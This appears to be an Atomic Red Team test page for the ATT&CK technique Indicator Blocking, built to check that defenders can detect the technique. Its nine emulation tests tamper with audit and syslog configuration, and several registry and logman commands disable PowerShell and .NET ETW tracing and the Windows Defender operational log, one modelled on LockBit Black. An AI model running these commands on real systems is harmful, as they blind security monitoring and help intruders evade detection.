T1562.006 - Impair Defenses: Indicator Blocking

Description from ATT&CK

An adversary may attempt to block indicators or events typically captured by sensors from being gathered and analyzed. This could include maliciously redirecting(Citation: Microsoft Lamin Sept 2017) or even disabling host-based sensors, such as Event Tracing for Windows (ETW)(Citation: Microsoft About Event Tracing 2018), by tampering settings that control the collection and flow of event telemetry.(Citation: Medium Event Tracing Tampering 2018) These settings may be stored on the system in configuration files and/or in the Registry as well as being accessible via administrative utilities such as [PowerShell](https://attack.mitre.org/techniques/T1059/001) or [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). For example, adversaries may modify the `File` value in HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security to hide their malicious actions in a new or different .evtx log file. This action does not require a system reboot and takes effect immediately.(Citation: disable_win_evt_logging) ETW interruption can be achieved multiple ways, however most directly by defining conditions using the [PowerShell](https://attack.mitre.org/techniques/T1059/001) Set-EtwTraceProvider cmdlet or by interfacing directly with the Registry to make alterations. In the case of network-based reporting of indicators, an adversary may block traffic associated with reporting to prevent central analysis. This may be accomplished by many means, such as stopping a local process responsible for forwarding telemetry and/or creating a host-based firewall rule to block traffic to specific hosts responsible for aggregating events, such as security information and event management (SIEM) products. In Linux environments, adversaries may disable or reconfigure log processing tools such as syslog or nxlog to inhibit detection and monitoring capabilities to facilitate follow on behaviors (Citation: LemonDuck).

Atomic Tests


Atomic Test #1 - Auditing Configuration Changes on Linux Host

Emulates modification of auditd configuration files

Supported Platforms: Linux

auto_generated_guid: 212cfbcf-4770-4980-bc21-303e37abd0e3

Inputs:

| Name | Description | Type | Default Value | |——|————-|——|—————| | audisp_config_file_name | The name of the audispd configuration file to be changed | string | audispd.conf| | auditd_config_file_name | The name of the auditd configuration file to be changed | string | auditd.conf| | libaudit_config_file_name | The name of the libaudit configuration file to be changed | string | libaudit.conf|

Attack Commands: Run with
1
bash
! Elevation Required (e.g. root or admin)

1
2
3
4
5
6
sed -i '$ a #art_test_1562_006_1' /etc/audisp/#{audisp_config_file_name}
if [ -f "/etc/#{auditd_config_file_name}" ];
then sed -i '$ a #art_test_1562_006_1' /etc/#{auditd_config_file_name}
else sed -i '$ a #art_test_1562_006_1' /etc/audit/#{auditd_config_file_name}
fi 
sed -i '$ a #art_test_1562_006_1' /etc/#{libaudit_config_file_name}

Cleanup Commands:

1
2
3
4
5
6
sed -i '$ d' /etc/audisp/#{audisp_config_file_name}
if [ -f "/etc/#{auditd_config_file_name}" ];
then sed -i '$ d' /etc/#{auditd_config_file_name}
else sed -i '$ d' /etc/audit/#{auditd_config_file_name}
fi
sed -i '$ d' /etc/#{libaudit_config_file_name}



Atomic Test #2 - Auditing Configuration Changes on FreeBSD Host

Emulates modification of auditd configuration files

Supported Platforms: Linux

auto_generated_guid: cedaf7e7-28ee-42ab-ba13-456abd35d1bd

Inputs:

| Name | Description | Type | Default Value | |——|————-|——|—————| | auditd_config_file_name | The name of the auditd configuration file to be changed | string | audit_event|

Attack Commands: Run with
1
sh
! Elevation Required (e.g. root or admin)

1
echo '#art_test_1562_006_1' >> /etc/security/#{auditd_config_file_name}

Cleanup Commands:

1
sed -i "" '/#art_test_1562_006_1/d' /etc/security/#{auditd_config_file_name}



Atomic Test #3 - Logging Configuration Changes on Linux Host

Emulates modification of syslog configuration.

Supported Platforms: Linux

auto_generated_guid: 7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c

Inputs:

| Name | Description | Type | Default Value | |——|————-|——|—————| | syslog_config_file_name | The name of the syslog configuration file to be changed | string | syslog.conf| | rsyslog_config_file_name | The name of the rsyslog configuration file to be changed | string | rsyslog.conf| | syslog_ng_config_file_name | The name of the syslog-ng configuration file to be changed | string | syslog-ng.conf|

Attack Commands: Run with
1
bash
! Elevation Required (e.g. root or admin)

1
2
3
4
5
6
7
8
9
if [ -f "/etc/#{syslog_config_file_name}" ];
then sed -i '$ a #art_test_1562_006_2' /etc/#{syslog_config_file_name}
fi
if [ -f "/etc/#{rsyslog_config_file_name}" ];
then sed -i '$ a #art_test_1562_006_2' /etc/#{rsyslog_config_file_name}
fi
if [ -f "/etc/syslog-ng/#{syslog_ng_config_file_name}" ];
then sed -i '$ a #art_test_1562_006_2' /etc/syslog-ng/#{syslog_ng_config_file_name}
fi

Cleanup Commands:

1
2
3
4
5
6
7
8
9
if [ -f "/etc/#{syslog_config_file_name}" ];
then sed -i '$ d' /etc/#{syslog_config_file_name}
fi
if [ -f "/etc/#{rsyslog_config_file_name}" ];
then sed -i '$ d' /etc/#{rsyslog_config_file_name}
fi
if [ -f "/etc/syslog-ng/#{syslog_ng_config_file_name}" ];
then sed -i '$ d' /etc/syslog-ng/#{syslog_ng_config_file_name}
fi



Atomic Test #4 - Logging Configuration Changes on FreeBSD Host

Emulates modification of syslog configuration.

Supported Platforms: Linux

auto_generated_guid: 6b8ca3ab-5980-4321-80c3-bcd77c8daed8

Inputs:

| Name | Description | Type | Default Value | |——|————-|——|—————| | syslog_config_file_name | The name of the syslog configuration file to be changed | string | syslog.conf|

Attack Commands: Run with
1
sh
! Elevation Required (e.g. root or admin)

1
2
3
if [ -f "/etc/#{syslog_config_file_name}" ];
then echo '#art_test_1562_006_2' >> /etc/#{syslog_config_file_name}
fi

Cleanup Commands:

1
2
3
if [ -f "/etc/#{syslog_config_file_name}" ];
then sed -i "" '/#art_test_1562_006_2/d' /etc/#{syslog_config_file_name}
fi



Atomic Test #5 - Disable Powershell ETW Provider - Windows

This test was created to disable the Microsoft Powershell ETW provider by using the built-in Windows tool, logman.exe. This provider is used as a common source of telemetry in AV/EDR solutions.

Supported Platforms: Windows

auto_generated_guid: 6f118276-121d-4c09-bb58-a8fb4a72ee84

Inputs:

| Name | Description | Type | Default Value | |——|————-|——|—————| | ps_exec_location | Location of PSExec. | string | PathToAtomicsFolder\..\ExternalPayloads\pstools\PsExec.exe| | session | The session to disable. | string | EventLog-Application| | provider | The provider to disable. | string | Microsoft-Windows-Powershell|

Attack Commands: Run with
1
powershell
! Elevation Required (e.g. root or admin)

1
cmd /c "#{ps_exec_location}" -accepteula -i -s cmd.exe /c logman update trace "#{session}" --p "#{provider}" -ets

Cleanup Commands:

1
cmd /c "#{ps_exec_location}" -i -s cmd.exe /c logman update trace "#{session}" -p "#{provider}" -ets

Dependencies: Run with
1
powershell
!

Description: PSExec must be installed on the machine.
Check Prereq Commands:
1
if (Test-Path "#{ps_exec_location}") {exit 0} else {exit 1}
Get Prereq Commands:
1
2
3
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PStools.zip"
expand-archive -literalpath "PathToAtomicsFolder\..\ExternalPayloads\PStools.zip" -destinationpath "PathToAtomicsFolder\..\ExternalPayloads\pstools" -force



Atomic Test #6 - Disable .NET Event Tracing for Windows Via Registry (cmd)

Disables ETW for the .NET Framework using the reg.exe utility to update the Windows registry

Supported Platforms: Windows

auto_generated_guid: 8a4c33be-a0d3-434a-bee6-315405edbd5b

Attack Commands: Run with
1
command_prompt
! Elevation Required (e.g. root or admin)

REG ADD HKLM\Software\Microsoft\.NETFramework /v ETWEnabled /t REG_DWORD /d 0

Cleanup Commands:

REG DELETE HKLM\Software\Microsoft\.NETFramework /v ETWEnabled /f > nul 2>&1



Atomic Test #7 - Disable .NET Event Tracing for Windows Via Registry (powershell)

Disables ETW for the .NET Framework using PowerShell to update the Windows registry

Supported Platforms: Windows

auto_generated_guid: 19c07a45-452d-4620-90ed-4c34fffbe758

Attack Commands: Run with
1
powershell
! Elevation Required (e.g. root or admin)

1
New-ItemProperty -Path HKLM:\Software\Microsoft\.NETFramework -Name ETWEnabled -Value 0 -PropertyType "DWord" -Force

Cleanup Commands:

1
REG DELETE HKLM\Software\Microsoft\.NETFramework /v ETWEnabled /f > $null 2>&1



Atomic Test #8 - LockBit Black - Disable the ETW Provider of Windows Defender -cmd

An adversary can disable the ETW Provider of Windows Defender, so nothing would be logged to Microsoft-Windows-Windows-Defender/Operational anymore. https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a

Supported Platforms: Windows

auto_generated_guid: f6df0b8e-2c83-44c7-ba5e-0fa4386bec41

Attack Commands: Run with
1
command_prompt
! Elevation Required (e.g. root or admin)

reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" /v Enabled /t REG_DWORD /d 0 /f

Cleanup Commands:

reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" /v Enabled /f >nul 2>&1



Atomic Test #9 - LockBit Black - Disable the ETW Provider of Windows Defender -Powershell

An adversary can disable the ETW Provider of Windows Defender, so nothing would be logged to Microsoft-Windows-Windows-Defender/Operational anymore. https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a

Supported Platforms: Windows

auto_generated_guid: 69fc085b-5444-4879-8002-b24c8e1a3e02

Attack Commands: Run with
1
powershell
! Elevation Required (e.g. root or admin)

1
New-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" -Name Enabled  -PropertyType DWord -Value 0 -Force

Cleanup Commands:

1
Remove-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" -Name Enabled -Force -ErrorAction Ignore